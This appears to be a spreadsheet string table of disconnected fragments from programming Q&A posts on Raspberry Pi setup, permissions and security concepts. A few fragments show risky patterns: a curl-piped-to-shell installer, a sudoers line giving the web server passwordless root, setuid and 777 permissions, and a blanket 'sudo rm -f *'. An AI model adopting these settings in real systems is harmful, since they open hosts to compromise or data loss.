    <t>I've chowned the destination directory to the user I'm running the Python script as, and chmodded it to 777 so I don't believe that it is a permissions problem.</t>
  </si>
  <si>
    <t>bcompiler enables you to encode your scripts in phpbytecode, enabling you to protect the source code.</t>
  </si>
  <si>
    <t>XML
In XML, the XML namespace specification enables the names of elements and attributes in an XML document to be unique.</t>
  </si>
  <si>
    <t>In that context, they can be connected through instances of the DataRelation class, and constrained by ForeignKeyConstraint or UniqueConstraint instances.</t>
  </si>
  <si>
    <t>I cant reconfigure every Browser, its for the clients
All is hosted at my raspberry pi with apache2 webserver
edit:
I tried to add
in line 120 from digest-ajax.js
But I get error
digest-ajax.js:
(function($) {
DigestAjax = function() {};
////////////////////////////////////////////////////////////////////////////
//      AuthHelper Function
////////////////////////////////////////////////////////////////////////////
/**
 * This function is intended to be overriden to help supply credentials.</t>
  </si>
  <si>
    <t>For example, my local Python program holds a list of people that have permissions to access the room, I want to be able to add or remove people from this list from the web while the script is running.</t>
  </si>
  <si>
    <t>From userspace, you'd need support from the OS to allow you to request it; Linux, for example, has an ARM-specific syscall which GCC provides an interface to via  - there might be some permission-related caveats, although I don't see any reference to VMA permissions in the current mainline kernel code, so maybe it was a quirk of older kernels.</t>
  </si>
  <si>
    <t>wifi_config_t wifi_config = {0}; // Zero initialize all struct memberes
strcpy((char *)wifi_config.sta.ssid, ESP_SSID);
strcpy((char *)wifi_config.sta.password, ESP_PASS);
Note that it is necessary to cast the uint8_t * to char *, due to the compilation options used in the ESP IDF build process.</t>
  </si>
  <si>
    <t>You can overwrite this functionality by setting the $primary_key instance variable:
class Post_model extends MY_Model
{
    public $primary_key = 'post_id';
}
Callbacks/Observers
There are many times when you'll need to alter your model data before it's inserted or returned.</t>
  </si>
  <si>
    <t>SecureZeroMemory(&amp;dcb, sizeof(DCB));
   dcb.DCBlength = sizeof(DCB);
   //  Build on the current configuration by first retrieving all current
   //  settings.</t>
  </si>
  <si>
    <t>The ISR_function however executes code that is dependent on the the private data members of each specific instance.</t>
  </si>
  <si>
    <t>So the problem is that my code jumps straight to the else statement, infering that the password typed is wrong (although no password was actually typed).</t>
  </si>
  <si>
    <t>Plus, AWS discourages it as stated in the AWS IoT documentation:
Note
We do not recommend using personally identifiable information in your
  topics.</t>
  </si>
  <si>
    <t>I struggled for a while until I found them, but for me the key was to set up SSH forwarding within sshd_config (most distros seem to enable this by default, but Arch doesn't).</t>
  </si>
  <si>
    <t>You will find, however, a call to led_classdev_register when the driver is probed, which takes a struct led_classdev* as a parameter.</t>
  </si>
  <si>
    <t>Alternatively, it should be possible to access the device as a non-root user if for some reason you are unable to run the program under sudo.</t>
  </si>
  <si>
    <t>So the compiler will give these uninitialized values (in a global array) a default of 0.</t>
  </si>
  <si>
    <t>The driver for a sensor must indicate that the hardware is integrated
  with the PC chassis for it to be accessible via this namespace.</t>
  </si>
  <si>
    <t>I'm a new user...this script worked for me:
The script finds my bluetooth mouse...MAC address partially hidden:</t>
  </si>
  <si>
    <t>On some systems (FreeBSD), it further works identically to the related `setgid` flag on directories, causing new files to inherit the directory's permissions rather than the current user's.</t>
  </si>
  <si>
    <t>An anonymous (or unnamed) namespace in C++ restricts a set of declarations to a single file.</t>
  </si>
  <si>
    <t>The getcwd() function retrieves the current working directory pathname on POSIX compliant machines.</t>
  </si>
  <si>
    <t>The class any is a type-safe container for single values of any type.</t>
  </si>
  <si>
    <t>Amazon EC2 Instance Connect provides a secure way to connect to instances using Secure Shell (SSH).</t>
  </si>
  <si>
    <t>By default, Laravel includes a User model in your app/models directory which may be used with the default Eloquent authentication driver.</t>
  </si>
  <si>
    <t>In readable Python code, you declare what methods are available on your fake and how they should be called.</t>
  </si>
  <si>
    <t>In this protocol, trust between resource owner and resource server(authentication) is built on top of tokens.</t>
  </si>
  <si>
    <t>When this css rule is loaded by the browser, all html elements (including their children) that are tagged with the ngCloak directive are hidden.</t>
  </si>
  <si>
    <t>In this particular case, the class file should end up in /WEB-INF/classes/com/example/LoginFilter.class.</t>
  </si>
  <si>
    <t>Masking the typed characters is default property of PasswordBox control.</t>
  </si>
  <si>
    <t>Once so declared, the entire textual extent of the type or member is considered an unsafe context.</t>
  </si>
  <si>
    <t>A RELAX NG schema specifies a grammar that a validator can apply to XML documents to determine whether or not they are valid.</t>
  </si>
  <si>
    <t>The opposite of robust code is fragile code; an example of fragile code would be having a class with all its member variables marked as public.</t>
  </si>
  <si>
    <t>By default (that is, for the built-in user accounts and user accounts created using the Active Directory Users and Computers snap-in), the UPN can consist of any name for the user (such as the sAMAccountName attribute of the user) and the domain tree name to which the user belongs in the following form: @.</t>
  </si>
  <si>
    <t>When encrypting arbitrary data (including entire XML documents), the EncryptedData element may become the root of a new XML document or become a child element in an application-chosen XML document.</t>
  </si>
  <si>
    <t>Most code isn't protected against interrupts, so the timer interrupt can occur while data structures are in an inconsistent state.</t>
  </si>
  <si>
    <t>Because the
  types defined in such an assembly are not to be signed by the
  publisher of the PIA, they are incompatible with the definitions
  provided in the PIA.</t>
  </si>
  <si>
    <t>Here is the entire script:
#!/bin/bash
#This script combines multiple AVI files within the current directory, into one long video
cd /media/myBook/Security/yesterday
sudo mv * /home/pi/Videos/tempconversion
cd /home/pi/Videos/tempconversion
ffmpeg -f concat -safe 0 -i &lt;(find .</t>
  </si>
  <si>
    <t>If any of these variables is used to execute dangerous commands (such as direct commands to a SQL database or the host computer operating system), the taint checker warns that the program is using a potentially dangerous tainted variable.</t>
  </si>
  <si>
    <t>Below are the commands I've tried in order:
1) 
2) apt-get install apt-transport-https ca-certificates software-properties-common
3) 
After running the above commands, I tried running apt-get update:
root@raspberrypi:/home/pi# apt-get update
Hit:1 http://archive.raspberrypi.org/debian buster InRelease
Err:2 https://apt.dockerproject.org/repo raspbian-buster InRelease
  403  Forbidden [IP: 13.249.111.113 443]
Ign:3 https://download.docker.com/linux/raspbian 10 InRelease
Err:4 https://download.docker.com/linux/raspbian 10 Release
  404  Not Found [IP: 13.249.109.27 443]
Hit:5 http://raspbian.raspberrypi.org/raspbian buster InRelease
Reading package lists...</t>
  </si>
  <si>
    <t>When I run the Python script, I get the following error:
I have tried running the script as root (both with sudo and with actually logging in as root).</t>
  </si>
  <si>
    <t>After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" to try again
to boot into default mode.</t>
  </si>
  <si>
    <t>There are possibly use cases where it makes sense to treat it as signed, but I can't think of any off the type of my head.</t>
  </si>
  <si>
    <t>SAML version 2 (saml-2.0) adds digital signatures and resolves back into the SAML standard enhancements made to the SAML 1.1 (saml-1.1) specification by other systems (for instance Shibboleth and WS-federation).</t>
  </si>
  <si>
    <t>A CSS hack is a technique which uses implementation bugs in the style sheet parser of a browser family or a particular version(s) of a browser to identify it and apply specific CSS properties, usually for the purpose of cross-browser consistency.</t>
  </si>
  <si>
    <t>Also in order to access successfully the serial port from an unprivileged account, you might need to add that user (your user) to a specific group (dialout group in Ubuntu and Fedora).</t>
  </si>
  <si>
    <t>I just read in the man of sudo of my fedora 25:
Running shell scripts via sudo can expose the same kernel bugs that make setuid shell scripts unsafe on some operating systems (if your OS has a /dev/fd/ directory, setuid shell scripts are generally safe).</t>
  </si>
  <si>
    <t>Class member access on instantiation has been added, e.g.</t>
  </si>
  <si>
    <t>Judging by your error :
../../MPU9250.h: In function 'void initMovementDetected()':
  ../../MPU9250.h:196:7: error: 'MPU9250::A_scale AFS_8G' is protected
         AFS_8G,
         ^
  ../../nRF52.cpp:49:31: error: within this context
    mpu9250.setAccScale(MPU9250::AFS_8G);
And your data structure :
I can assume that you're trying to call  from outside of the MPU9250 class which is impossible because of the accessibility of that function.</t>
  </si>
  <si>
    <t>Here is my problem:
With the WMI providers I got UWF enabled by now (), but I cannot protect any volume.</t>
  </si>
  <si>
    <t>In Java, for example, classes that are in the same package also have access to each other's protected members.</t>
  </si>
  <si>
    <t>This example passes an anonymous function (PHP &gt;= 5.3) but you can pass the function name instead.</t>
  </si>
  <si>
    <t>All this is supported by OMA DRM to protect your intellectual property.</t>
  </si>
  <si>
    <t>Best to literally say namenode, data{1,2,3}, yarn-rm, and so on
Regarding permissions issues, you could run everything as root, but that's insecure outside a homelab, so you'd want to run a few adduser commands for at least hduser (as documented elsewhere, but can be anything else), and yarn, then run commands as those users, after chown -R the data and log directories to be owned by these users and Unix groups they belong to</t>
  </si>
  <si>
    <t>The following classes are derived from Validation Attribute:
CompareAttribute
CustomValidationAttribute
DataTypeAttribute
MaxLengthAttribute
MinLengthAttribute
RangeAttribute
RegularExpressionAttribute
RequiredAttribute
StringLengthAttribute</t>
  </si>
  <si>
    <t>The bitwise mask often has the three digits, specifying (from left to right) permissions for the world, group and the owner of the file.</t>
  </si>
  <si>
    <t xml:space="preserve">
For just invalid device signature - (this usually occurs if internal clock is on)
For the ATMEGA328p if it is preloaded with a bootloader for some reason there is a mismatch in signatures so you'll have to do this THEN UNDO IT &lt;&lt; please don't forget or else you'll have to bootload everytime before you write a script until you UNDO this.</t>
  </si>
  <si>
    <t>For example:
java
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
AppIdentityCredential credential =
    new AppIdentityCredential(Arrays.asList(UrlshortenerScopes.URLSHORTENER));
Urlshortener shortener =
    new Urlshortener.Builder(new UrlFetchTransport(), new JacksonFactory(), credential)
    .build();
UrlHistory history = shortener.URL().list().execute();
...
}
The library runs on Android (@Beta).</t>
  </si>
  <si>
    <t>It's permissions are: -rxwrxwrxw 1 motion motion 66 Feb 19 10:20 /home/pi/detect/detect.sh
This script, contains this code:
As you can see, this script executes my Python script.</t>
  </si>
  <si>
    <t>I tried to replace my buffer (char buf[fileSize];) with a unique pointer like this: std::unique_ptr&lt;char[]&gt; buf(new char[fileSize]); (in the function readFile) using buf.get() in the next 2 statements but with the exact same result.</t>
  </si>
  <si>
    <t>Although I can't create a variable of type IDENTITY anywhere outside of a function; so I am not sure exactly how to handle this.</t>
  </si>
  <si>
    <t>Make sure
  you compile libmcrypt with the option --disable-posix-threads .</t>
  </si>
  <si>
    <t>Use the AppAssertionCredentials class to create a
  Credentials object without using a Flow object.</t>
  </si>
  <si>
    <t>Even though UDP is considered fire and forget, (unlike TCP), unicast UDP through WiFi is reliable because reliability is built into the WiFi protocol.</t>
  </si>
  <si>
    <t>The only way to protect against this is to disable interrupts whenever your code might be accessing hardware or might have modifying data structures.</t>
  </si>
  <si>
    <t>Not to be confused with text box control which also has the password masking capability to hide any character being typed in it.</t>
  </si>
  <si>
    <t>X.509 Certificates contain many common elements:
A subject in the form of an X.500 Distinguished Name, such as the host name of a server like "CN=myserver.mydomain.com".</t>
  </si>
  <si>
    <t>Properties of Surrogate Keys
If there is a natural key in the model, it cannot be replaced with a surrogate key.</t>
  </si>
  <si>
    <t>trust-zone - a security feature in some armv6, armv8 and armv7 CPUs.</t>
  </si>
  <si>
    <t>Applications should throw instances of this exception to indicate other illegal uses of the null object.</t>
  </si>
  <si>
    <t>An anonymous function or class is one that, in contrast to normal practice, has no name.</t>
  </si>
  <si>
    <t>I looked around a bit and it seems you may be able to make sure it is set in your wifi script after  (I've also had to implement such a script on every raspberry pi setup I've ever made due to wifi inconsistencies)
Though it should be noted that I personally have never set up a static ip on a pi, I use a reverse tunneling service so I never have to worry about port forwarding.</t>
  </si>
  <si>
    <t>2) If an instance of this class gets copy-constructed, or the default assignment operator gets invoked, this is guaranteed to result in memory corruption, with an extra side-helping of a memory leak.</t>
  </si>
  <si>
    <t>In the parent class 'WebServer_My2.h', all I did was to modify 'WebServer.h' by changing 'private:' to 'protected:', and the class name.</t>
  </si>
  <si>
    <t>On my windows machine open Xlauch to start Xming I leave the default values but I disable access control.</t>
  </si>
  <si>
    <t>-Factory Default settings except connection type:
--Using AT+TYPE3 (3:Auth and bond ).</t>
  </si>
  <si>
    <t>-name '*.avi' -printf "file '$PWD/%p'\n") -c copy "$(date -d '-1 day' +'%F')".avi
sudo mv "$(date -d '-1 day' +'%F')".avi /media/myBook/Security/yesterday
sudo rm -f *
Why am I getting the syntax error only when the same command is being issued within an executable script?</t>
  </si>
  <si>
    <t>Here is the full code, if you want to run it you will need pctrl and bluepy to install them use sudo apt-get install python-prctl and sudo pip install bluepy and lastly change the permission of bluesy-helper executable using sudo chmod 4755 bluepy-helper to remove the need for sudo to access the bluetooth module.</t>
  </si>
  <si>
    <t>I want to expose bash script as web service which can be triggered via other nodes in the same network.</t>
  </si>
  <si>
    <t>This expression is evaluated as int + pointer that results in a corrupted pointer.</t>
  </si>
  <si>
    <t>According to the official PHP documentation, for exec(), system() and passthru() these restrictions are:
You can only execute executables within the safe_mode_exec_dir.</t>
  </si>
  <si>
    <t>Seems like the host application had multiple instances spawned by the watchdog process and that's why the issue was occurring.</t>
  </si>
  <si>
    <t>You can find more information about the HID report descriptor in the Device Class Definition for HID v1.11.</t>
  </si>
  <si>
    <t>This can occur in dependently typed programming languages, where the type checker cannot always verify everything automatically.</t>
  </si>
  <si>
    <t>The restrict-qualifier tells the compiler that if the memory accessed by the restrict-qualified pointer is modified, no other pointers will access it.</t>
  </si>
  <si>
    <t>Security Rules determine who has read and write access to the data in your Firebase Database, Cloud Storage for Firebase, and Cloud Firestore.</t>
  </si>
  <si>
    <t>Rauth is a simple Python OAuth 1.0/a, OAuth 2.0, and Ofly consumer library built on top of Python Requests.</t>
  </si>
  <si>
    <t>If the server rejects their request or executes it differently, the client is patched up with what actually happened.</t>
  </si>
  <si>
    <t>Type invariants specify boundary constraints for objects of an encapsulated (private) type.</t>
  </si>
  <si>
    <t>You can use the Firefly SDK to supplement item identification or build actionable options for customers after an item is recognized.</t>
  </si>
  <si>
    <t>Whole sets of files can be registered and placed in its own tab in the new content
element wizard, letting you group your content elements.</t>
  </si>
  <si>
    <t>Security rules determine who has read and write access to the data in your Firebase Database, Cloud Storage for Firebase, and Cloud Firestore.</t>
  </si>
  <si>
    <t>The SQLite compilation options include:-
Foreign Key enabled by default.</t>
  </si>
  <si>
    <t>OWASP Top Ten Project
The OWASP Top Ten flagship project provides a list of critical application security vulnerabilities.</t>
  </si>
  <si>
    <t>In .NET applications, the culprit is frequently a property accessor returning the property itself, rather than the private backing field.</t>
  </si>
  <si>
    <t>Differently from the latter, they don't use properties to validate the user input, but to render an item on a page.</t>
  </si>
  <si>
    <t>By default, only few
functions are exposed to the sandbox namespace which limits the attack surface.</t>
  </si>
  <si>
    <t>Properties are represented syntactically as identifiers and are scoped, so the compiler can detect use of undeclared properties.</t>
  </si>
  <si>
    <t>(unexpected_token at [all_tests_here1] lib\main.dart:10)
error: A value of type 'Future&lt;int&gt;' can't be assigned to a variable of type 'int'.</t>
  </si>
  <si>
    <t>The SignedXml class is the main class used for XML signing and verification (XMLDSIG) in the .NET Framework.</t>
  </si>
  <si>
    <t>The latest CakePHP stable version is 2.1.5 Security Release resolving security issues related to the XML class.</t>
  </si>
  <si>
    <t>Enter default username pi and password raspberry
Once you are logged in run the following commands, sudo apt-get update and sudo apt-get install tightvncserver , in that order.</t>
  </si>
  <si>
    <t>If you have problems with finding the log file being properly created, the reasons might be:
not having permission to create the log file
the script does not run at all
If you plan to run the script as long running service, I would recommend to skip creating explicit log file and rather log to stdout.</t>
  </si>
  <si>
    <t>To achieve that I added the following lines to /etc/rc.local (I'm on Debian):
So this gives write permissions to all the gpio group members.</t>
  </si>
  <si>
    <t>I am running the latest version of raspbian (image had a ssh and vnc disabled by default, I enabled it in pi configuration (raspi-config)).</t>
  </si>
  <si>
    <t>Different versions of Windows have different requirements for installing an unsigned driver, but have in common that Microsoft provides no means to programmatically install a driver that is not signed.</t>
  </si>
  <si>
    <t>If a kernel-mode driver accidentally writes to the wrong virtual address, data that belongs to the operating system or another driver could be compromised.</t>
  </si>
  <si>
    <t>I followed instructions on CRAN, so I 
added
to /etc/apt/sources.list 
ran apt-get update which was successful and gave me only a "signature error" for the public key as pointed out on the CRAN-site 
ran apt-get install r-base
But the result of the last command is  
I tried to install R-2.15 before and then run the above commands.</t>
  </si>
  <si>
    <t>So if your purchased certificate has expired, this enables you to issue an update to the application that programmatically uninstalls the current version and installs a new version signed with the new purchased certificate.</t>
  </si>
  <si>
    <t>The special "*" symbol in an Accept-Encoding field matches any
     available content-coding not explicitly listed in the header
     field.</t>
  </si>
  <si>
    <t>It creates locks only for a short time, while searching for a compiled PHP script in the cache, so one script can be executed simultaneously by several engines.</t>
  </si>
  <si>
    <t>They enabled the UNIX socket authentication plugin by default for newer versions.</t>
  </si>
  <si>
    <t>I have run into many "INSTALL_APPLICATION" errors, it could be any or none of these:
Download location differs on the device
Network issues during download
Volley issues (HTTP library) - was mostly version issues
Server not allowing HTTP calls (only HTTPS) which is the default for installing apps
Device Owner/Device Admin not set correctly
Missing permissions
What you can see on the HTTP access logs is whether the install is occurring but looking to see whether the APK is downloading, log entry will look like this:
If you see the APK being downloaded then you know for sure the issue is NOT on the server.</t>
  </si>
  <si>
    <t>First we are
  going to create a group that has access to USB devices
# groupadd usbusers
Then we add the user who will run the OpenERP server to usbusers
# usermod -a -G usbusers USERNAME
Then we need to create a udev rule that will automatically allow
  members of usbusers to access raw USB devices.</t>
  </si>
  <si>
    <t>explicit or implicit access to this prohibited) which may or may not be acceptable.</t>
  </si>
  <si>
    <t>Firefox: Userscript managers: Tampermonkey, Violentmonkey, and Greasemonkey add-ons.</t>
  </si>
  <si>
    <t>Important:
playmovie.sh has execute permissions
master/cmd has 777 permissions
writing to master/cmd and executing other scripts works fine both locally and online via php
from php online I can execute omxplayer -h, ls -l /home/pi/Videos/test.mp4, echo -n p &gt; /home/pi/master/cmd so it definitely recognizes those all as valid.</t>
  </si>
  <si>
    <t>The reason our button driver doesn't trigger any events in this case is because we have built-in debounce protection to ignore events that happen in such a short time span.</t>
  </si>
  <si>
    <t>These handlers are initiated by either hardware interrupts or interrupt instructions in software, and are used for servicing hardware devices and transitions between protected modes of operation such as system calls.</t>
  </si>
  <si>
    <t>The OpenSSH suite includes:
 - SSH deamon
sftp-server - SFTP server subsystem (though in current versions of OpenSSH, the SFTP server is built into the sshd.</t>
  </si>
  <si>
    <t>The first problem I had was the password and then the directory and then I didn't realize I needed SSH enabled but I eventually got NetBeans to communicate with the raspberry pi.</t>
  </si>
  <si>
    <t>They are protected variables, so all methods in the DateTime class can access them.</t>
  </si>
  <si>
    <t>In my example i called it response (argument to the anonymous function bind to success).</t>
  </si>
  <si>
    <t>Try this corrected version of your program:
Always, always enable warnings when compiling code.</t>
  </si>
  <si>
    <t>The C function also deallocates memory and clears *capture pointer.</t>
  </si>
  <si>
    <t>Mass assignment security provides an interface for protecting attributes from end-user assignment.</t>
  </si>
  <si>
    <t>HTTPS  Enabled by default and easy to configure in production.</t>
  </si>
  <si>
    <t>EDIT: I forgot to note that when troubleshooting this, whenever a corruption occurs, I re-initialize then save the data in the EEPROM again.</t>
  </si>
  <si>
    <t>Once the issue occurs, wifi disconnects and is unable to reconnect.</t>
  </si>
  <si>
    <t>It's very unlikely that Logitech made a fatal design flaw in the HID interface of their device.</t>
  </si>
  <si>
    <t>Note that you can pick several of these if you like to protect against different threats, or to build defense in depth.</t>
  </si>
  <si>
    <t>NSSlider object belongs to Apple's class it displays a range of values.</t>
  </si>
  <si>
    <t>The Aion Network is an accessible Blockchain platform which enables developers to build production grade Java applications on a Blockchain network.</t>
  </si>
  <si>
    <t>A RELAX NG schema specifies a grammar that a validator can apply to XML documents to determine whether or not they are schema-valid.</t>
  </si>
  <si>
    <t>this code is running on a raspberry pi3
i have a script /etc/rc2.d/S05frameapp that conditionally starts hostapd ( looks to see if wifi has been setup or not)
in the script(this section gets run if no wifi has been setup set for this device)
from the nohup , in the /tmp/hostapd.log i see
but if i now log in (via hardwired network) and run the following it works...
#/usr/sbin/hostapd -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf
Configuration file: /etc/hostapd/hostapd.conf
Failed to create interface mon.wlan0: -95 (Operation not supported)
wlan0: Could not connect to kernel driver
Using interface wlan0 with hwaddr b8:27:eb:40:bd:a4 and ssid 
"WhatUlooknAtWillis"
wlan0: interface state UNINITIALIZED-&gt;ENABLED
wlan0: AP-ENABLED
so i am kinfod thinking this may be a timing issue?</t>
  </si>
  <si>
    <t>If you want to use secure communication with target,
you might choose [y] to enable the SSL function.</t>
  </si>
  <si>
    <t>Now the Problem occurs, that the Database Credentials are stored in the Python Scripts running on the Raspberry Pi.</t>
  </si>
  <si>
    <t>If you do this, make sure you give access only to the one script, and make sure that your script does not have the potential to be a security hole.</t>
  </si>
  <si>
    <t>So you can try to find call of this function and remove it ;)
BUT: 
I advise you to not disable watchdog.</t>
  </si>
  <si>
    <t>Interrupt handlers need to run for as little time as possible - other interrupts may be locked out and they may interfere with the network stack and other housekeeping functions.</t>
  </si>
  <si>
    <t>The most common way to use QSslSocket is to construct an object and start a secure connection by calling connectToHostEncrypted().</t>
  </si>
  <si>
    <t>It has a type-safe API that allows C++ compiler to do a semantic checks at compile-time even before the assembled code is generated or run.</t>
  </si>
  <si>
    <t>If the receiver has loaded a class for the object that has a different  than that of the corresponding sender's class, then deserialization will result in an InvalidClassException.</t>
  </si>
  <si>
    <t>The PEVerify tool helps developers who generate Microsoft intermediate language (MSIL) (such as compiler writers, script engine developers, and so on) to determine whether their MSIL code and associated metadata meet type safety requirements.</t>
  </si>
  <si>
    <t>This question pertains to the BTD (Bluetooth device library)
In the header file under the protected variables it creates a pointer:
In the cpp:
I simply would like to know what the calling of pUsb(p) does.</t>
  </si>
  <si>
    <t>I'm trying to execute a php script but i'm having this kind of errors:
I've tried to set up the permission in the $ sudo visudo like this:
or
www-data ALL=NOPASSWD: ALL
but is not working, i'm able to execute this script only with sudo form the command line!</t>
  </si>
  <si>
    <t>to test the anonymous callback function when err has a value in which case I assert an exception is thrown back.</t>
  </si>
  <si>
    <t>I set ownership of both database and scripts to www-data and yet when I try to execute database-writing script I get following error:
I know already that it most probably means that permissions are not right.</t>
  </si>
  <si>
    <t>BTW, I chose to use a struct instead of a class for Bar because that information is immutable and should be private.</t>
  </si>
  <si>
    <t>Furthermore the configuration script options --enable-ssl2 and --enable-ssl3 are not existing (see in src/node.cc lines 2999 and 3001).</t>
  </si>
  <si>
    <t>One possibility, if you just have a couple of directories usable by certain users and hidden to others is to mount the device somewhere only root can reach (i.e.</t>
  </si>
  <si>
    <t>To access this service remotely you have to bind web server to any non-local address belonging to this raspberry pi (192.168.1.8) or to "any address" 0.0.0.0, as SSH service is bound.</t>
  </si>
  <si>
    <t>No router + no screen + regular Ethernet cable + RPI 2 + Raspbian Lite 2018-11-13 + Ubuntu 18.10
First we must enable the SSH server on the Pi, which is disabled by default for security.</t>
  </si>
  <si>
    <t>The libput list-devices command relies on
information in /run/udev/data, which isn't exposed inside the
container by default.</t>
  </si>
  <si>
    <t>The global interrupt enable bit is automatically disabled / enabled when entering / exiting an ISR.</t>
  </si>
  <si>
    <t>The ORA-01031: insufficient privileges error occurs when a user attempts to execute a program or function for which he has not been granted the appropriate privileges.</t>
  </si>
  <si>
    <t>Class helpers also introduces a wider scope for the compiler when resolving identifiers.</t>
  </si>
  <si>
    <t>Being able to specify the underlying type allow simpler interoperability and guaranteed sizes of enumerations and also enables forward declaration.</t>
  </si>
  <si>
    <t>The keyref element specifies that an attribute or element value correspond to those of the specified key or unique element in order to perform validation checks</t>
  </si>
  <si>
    <t>It could be used to insert the annotation prior to a class or method telling which sort of warning you want suppressed.</t>
  </si>
  <si>
    <t>Each element is composed of a key value that uniquely identifies the element, and a mapped value that is an object with the content.</t>
  </si>
  <si>
    <t>The drawer view controllers are hidden by default, but can be exposed by a user-initiated swipe in the direction that that drawer view controller is hidden in.</t>
  </si>
  <si>
    <t>The former can be defined as CSS filtering hacks and the latter can be defined as CSS targeting hacks.</t>
  </si>
  <si>
    <t>Although a date objects class is private, its interface is public, as declared by the abstract superclass NSDate.</t>
  </si>
  <si>
    <t>The parent page can write to the iframe's SRC url property, but it cannot read the property, since the URL might contain personal information.</t>
  </si>
  <si>
    <t>An AMI contains a template for the root volume of the instance (or VM), the permissions for where and how it is launched, and any block device (storage) mappings.</t>
  </si>
  <si>
    <t>The new status provides a stable specification for implementors, improved interoperability, and assurance that the intellectual property will remain unencumbered and free for all to use.</t>
  </si>
  <si>
    <t>No-throw guarantee: the operation is guaranteed not to fail
Strong exception safety: if the operation fails, the state will be as it was prior to the failure (rollback semantics)
Basic exception safety: no leaks will occur, and data is left in a valid state (but possibly changed)
No exception safety: no guarantees are made.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security',
 'CONFIGURE_CPPFLAGS': '',
 'CONFIGURE_LDFLAGS': '-Wl,-z,relro',
 'CONFIG_ARGS': "'--enable-shared' '--prefix=/usr' '--enable-ipv6' '--enable-unicode=ucs4' '--with-dbmliborder=bdb:gdbm' '--with-system-expat' '--with-computed-gotos' '--with-system-ffi' '--with-fpectl' 'CC=arm-linux-gnueabihf-gcc' 'CFLAGS=-Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-9xgeTe/python2.7-2.7.13=.</t>
  </si>
  <si>
    <t>The main improvement over ordinary Chrome userscripts is that Tampermonkey emulates the  functions that Greasemonkey uses to great effect.</t>
  </si>
  <si>
    <t>Here is the issue:
Here is a portion of my Docker file:
RUN apt-get update  &amp;&amp; \
apt-get install -y --no-install-recommends --allow-unauthenticated\
 curl\
 cargo
WORKDIR /usr/app
RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
COPY edgelet .</t>
  </si>
  <si>
    <t>Specifically the page describes how to configure the pi to automatically log in to one of the shells and how you can then run a script as the shell starts up.</t>
  </si>
  <si>
    <t>That said, there is one place in the console that you should check to verify that logs are enabled:  
- Under Greengrass Group, select the group, then go to "settings" from there you'll see "Local logs configuration."</t>
  </si>
  <si>
    <t>The way I see it, you have two options - either ask the received for its make/model/protocol type if such a query exists for these types of devices, or if they can be somehow made to provide some identifying information.</t>
  </si>
  <si>
    <t>If you just want the setup do this:
Install the watchdog package
Add a line to the watchdog service file
sudo nano /lib/systemd/system/watchdog.service
insert after [install]
Enable on boot
sudo systemctl daemon-reload
sudo systemctl enable watchdog
Reboot and check status
sudo systemctl status watchdog</t>
  </si>
  <si>
    <t>Currently supported are:
ecb
cbc
cfb
ncfb
nofb
ctr
The block encryption is handled by external classes, making this class extensible Currently the block ciphers used are:
rijndael-128
rijndael-192
rijndael-256
serpent
This is compatible with php's mcrypt.</t>
  </si>
  <si>
    <t>I see that I can get a pre-built version of Swift 4.1.2 from swift-arm.com: Swift 4.1.2 Updated For RaspberryPi 2/3
However, I'm inherently distrusting of anonymously posted binaries, and would like to understand how I can build it myself.</t>
  </si>
  <si>
    <t>"access denied" may be caused by missing some capabilities:
The home and work networks capability:  PrivateNetworkClientServer 
And at least one internet and public networks capability: InternetClient, InternetClientServer 
And, if applicable, the domain credentials capability: EnterpriseAuthentication 
Note: You must add File Type Associations to your app manifest that declare specific file types that your app can access in this location.</t>
  </si>
  <si>
    <t>The application must be compiled with  to make backtrace() work on ARM.</t>
  </si>
  <si>
    <t>Credentials is class X : ServiceClientCredentials and the certificate is added in InitializeServiceClient using        handler.ClientCertificates.AddRange(certs);
ProcessHttpRequestAsync is not overridden.</t>
  </si>
  <si>
    <t>Have you checked to make sure your script has the proper permissions?</t>
  </si>
  <si>
    <t>However, HID over GATT was at some point added to the Default.</t>
  </si>
  <si>
    <t>What I really am trying to achieve, is that I want to implement a script that will remove Masquerade the moment it appears in POSTROUTING with python iptables as I have found nothing that will support this other than python iptables if I am correct eg:
if that makes any sense at all.</t>
  </si>
  <si>
    <t>Adding the user (www-data) to /etc/sudoers for the particular executable that needs to be run as root helped.</t>
  </si>
  <si>
    <t>You should call  at the end of your program:
As mentioned on RPi.GPIO basics 3  How to Exit GPIO programs cleanly, avoid warnings and protect your Pi:
RPi.GPIO provides a built-in function GPIO.cleanup() to clean up all
  the ports youve used.</t>
  </si>
  <si>
    <t>This pattern has been referred to as a self-executing anonymous function.</t>
  </si>
  <si>
    <t>An element may be "valid" without content if it has the attribute xsi:nil with the value true.</t>
  </si>
  <si>
    <t>Any idea i think that error is due to the reason of some permissions as i am using the user pi and owners of these directory is root .</t>
  </si>
  <si>
    <t>Either use your existing watchdog solution or add your webserver user in your sudoers file.</t>
  </si>
  <si>
    <t>Warning : Make sure to configure database and security group to allow connections from outside.</t>
  </si>
  <si>
    <t>If you'd like to learn more about them, take a look here
To decrypt this a little, here's a breakdown:
You have a function that takes another function via a template argument.</t>
  </si>
  <si>
    <t>Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).</t>
  </si>
  <si>
    <t>But then when I try to deactivate the system it takes the pin and just clears the screen and execute the mainScreen function that i have set.</t>
  </si>
  <si>
    <t>Here is my code:
In the  function, I'm attempting to turn off the watchdog using WDTCSR |= _BV(WDTON); however my compiler complains that WDTON is not decalared in its scope.</t>
  </si>
  <si>
    <t>The output of the script is as follows:
Why doesn't the script, or maybe the Raspberry as I guess from the prompt, let me type the password?</t>
  </si>
  <si>
    <t>One way to implement that functionality is check the callback function result and the parent  (SendConfirmationCallback - IoTHubClient_LL_SendEventAsync in SDK-C).</t>
  </si>
  <si>
    <t>A class that defines an immutable vs. mutable distinction adopts this protocol to allow mutable copies of its instances to be made.</t>
  </si>
  <si>
    <t>The purpose of an obfuscator is to protect intellectual property rights of the software developer.</t>
  </si>
  <si>
    <t>It is hard to write a simple definition of something as varied as hacking, but I think what these activities have in common is playfulness, cleverness, and exploration.</t>
  </si>
  <si>
